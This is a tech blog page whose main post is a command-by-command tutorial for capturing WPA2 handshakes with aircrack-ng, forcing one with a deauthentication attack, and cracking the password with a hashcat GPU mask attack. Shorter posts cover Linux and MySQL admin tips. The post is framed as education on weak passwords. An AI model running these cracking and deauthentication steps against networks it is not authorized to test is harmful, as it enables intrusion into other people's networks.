Cracking WiFi keys with Aircrack-ng and hashcat using GPU

Posted on July 29, 2021 by SoCRaT

Disclaimer

This post is for educational purposes only and should NOT be used otherwise. The primary aim is to understand how a weak WiFi password can be compromised in a few minutes, if not less.

Introduction

In this post I will be explaining how you could easily brute force (masked) a weak WPA2 WiFi password that consists only of 8 digits (as many people do) using a local laptop with an old GPU card in a few minutes. So, probably the first thing you do after reading this (or even before reading) is to create a new password for your WiFi network with more than 8 characters, including numbers, a mix of upper & lower case and special characters.

The use of nvidia GPU here is due to the huge parallelism that can be achieved with it vs CPU, mainly due to the hundreds/thousands of CUDA cores.

Prerequisites

Software Requirements

  • Linux, I’d recommend using Kali or Ubuntu, but it’s totally up to you
  • Aircrack-ng to sniff the packets and record a WPA handshake
  • hashcat to brute force the password
  • hashcat-utils for converting the output to the proper format for hashcat
  • CUDA toolkit 9 or later versions for utilizing the GPU cuda cores for cracking

Hardware Requirements

  • A WiFi card that supports monitoring mode (promiscuous), here are some examples.
  • Any nvidia card with CUDA 9 support

Let’s SNIFF!

Start Monitoring Mode

airmon-ng start <YOUR_WIFI_CARD_NAME_FROM_IWCONFIG>

Monitor and list all networks around you

airodump-ng <YOUR_WIFI_MONITORING_INTERFACE> #usually wlan0mon

CH 3 ][ Elapsed: 30 s ][ 2021-05-19 04:25
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:FB:5D:00:2B:E0 -87 38 1 0 8 130 WPA2 CCMP PSK MYHome
54:39:DF:7C:83:B8 -86 39 0 0 6 130 WPA2 CCMP PSK Qtel-BB1
48:F9:B3:B7:A2:64 -80 28 1 0 8 195 WPA CCMP PSK BAMB 2
D8:48:0B:54:56:0D -84 17 0 0 11 130 WPA2 CCMP PSK Qtel-BB-2
02:26:89:70:BD:1D -84 5 0 0 6 130 WPA CCMP PSK dlink

Capturing Packets

To start capturing packets from MYHome for example:

airodump-ng -c 8 --bssid E5:FB:5D:00:2A:E0 -w MYHome.out wlan0mon #wait till a full handshake occurs between a client and the network

What to do if NO handshake occurs

If a handshake doesn’t occur after waiting for some time, you can force it in another terminal (but take care you are moving from passive attack to active now and you might get detected):

aireplay-ng -0 2 -a E4:FB:5D:00:2B:E0 wlan0mon

What to do if a handshake occurs

When on the top right you see a message that a handshake occured, you have to convert the cap file to a format recognized by hashcat (using hashcat-utils which are downloaded separately):

cap2hccapx.bin MYHome.out-01.cap MYHome.hccapx

Let’s crack it!

hashcat.bin -m 2500 -a3 MYHome.hccapx -1 ?l?u -2 ?l?u?d ?d?d?d?d?d?d?d?d -w 3 # -w makes GPU utilization 100%, but may freeze your screen

The above is just an example for a masked attack, which is way better than the regular Brute Force one (kind of optimized brute force). Your playground is the mask (in bold in the previous command), which you can consider as an art, since you have to guess the range of the passwords. For this article, I made all the mask as digits, i.e. 8 numbers between 0 and 9.

Advanced Tip: -1 and -2 (can also use -3 and -4) are custom charsets that can be composed out of the charsets below. If you want for example to indicate that a character would be either a small or capital letter, then use -1 ?l?u and then use 1 in the mask.

This is a list that shows all the available charsets supported by hashcat as of now

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

In case of a successful crack, hashcat will exit with Status: Cracked and will show you the password.

Enjoy!

Sources

Posted in Linux | Tagged , , , , , , , , , , , | Leave a comment

How to reset displays (monitors) settings for KDE Plasma and GNOME

Posted on April 4, 2021 by SoCRaT

Added GNOME

Just Some Techie Notes!

In case your display arrangement or settings, e.g. when you have 3 screens and you are for some reason unable to reorganize them or change their settings, just reset your display settings:

For KDE Plasma:

rm -rf .local/share/kscreen

For GNOME:

rm -rf .config/monitors.xml

Then just log out and back in.

That’s it! Enjoy!

Sources:

https://forum.kde.org/viewtopic.php?f=289&t=128190

https://askubuntu.com/questions/749333/how-can-i-reset-my-display-settings-through-terminal

View original post

Posted in Linux | Leave a comment

What to do when an SSH session hangs because of a network problem

Posted on March 16, 2021 by SoCRaT

It’s a very basic post, yet still useful!

Sometimes when you disconnect from a network or VPN or have any network connectivity problem in general that affects an established SSH connection to any of your servers, the terminal hangs for quite a while and you most probably just close the terminal and open a new one!

To avoid this, just do the following:

  1. Press Enter
  2. Press Shift + ~
  3. Press .

And the session is terminated without having to close the terminal window, that’s it!

Enjoy!

Source: A comment on one of the StackOverflow posts that I can’t find right now!

Posted in Linux | Tagged , , | Leave a comment

How to reset root user password in MySQL 5.7+

Posted on October 15, 2020 by SoCRaT

Was too busy and haven’t written anything for quite a while!

Anyway, here is how to reset the root user password in MySQL 5.7 and later in a nutshell!

service mysql stop
mkdir -p /var/run/mysqld
chown mysql:mysql /var/run/mysqld
mysqld_safe --skip-grant-tables &
mysql

mysql> UPDATE mysql.user SET authentication_string=PASSWORD('new-password') WHERE User='root';
mysql> FLUSH PRIVILEGES;
mysql> exit;

mysqladmin -u root -p shutdown
service mysql start

That’s it, Enjoy!

Sources:

Posted in Linux, MySQL | Tagged , , , , | Leave a comment

Create a filesystem report with Python

Posted on May 14, 2020 by SoCRaT

In many cases, data accumulates over time, and a lot of this data is not being accessed at all, sometimes for years. Accordingly, it would be great if you could create a report that shows which data, the last access date, its size and its owner.

With a few lines of Python, you can very efficiently traverse (I named it traverse.py) any mounted filesystem and save to a CSV file that has the following set of data:

  • Filename (with absolute path)
  • Last Access Date & Time
  • File Size (in bytes)
  • UID or username of the owner
import os, sys, time
import pathlib #pathlib only needed if fileowner will be a string not UID

for root, directories, filenames in os.walk(sys.argv[1]): #Loop through the filesystem or folder passed as an argument
    for filename in filenames:
        try:
            fullpath = os.path.join(root, filename) #Get full path of the file
            timelastaccessed = time.ctime(os.stat(fullpath).st_atime) #Get last access time
            filesize = os.stat(fullpath).st_size #Get file size
            fileowner = os.stat(fullpath).st_uid #Get file owner as a UID
            #fileowner = pathlib.Path(fullpath).owner() #Get file owner as a string, much slower
            print(fullpath, ",", timelastaccessed, ",", filesize, ",", fileowner, sep='')  #Format to output in CSV
        except OSError:
            print("Path does not exist or is inaccessible") #In case the file was inaccessible
        except UnicodeEncodeError:
            print("Encoding Error") #In case of files with names that throw a UnicodeEncodeError exception

To execute, just run:

python3 traverse.py filesystem_or_folder >> output.csv

The above outputs the UID, but if you want to output the username itself, just comment the fileowner = os.stat(xxxxx) and uncomment the next line that uses pathlib

You can then import that CSV file into any available analytics platform like PowerBI and do your magic!

That’s it! Enjoy!

Posted in Linux | Tagged , , , , | Leave a comment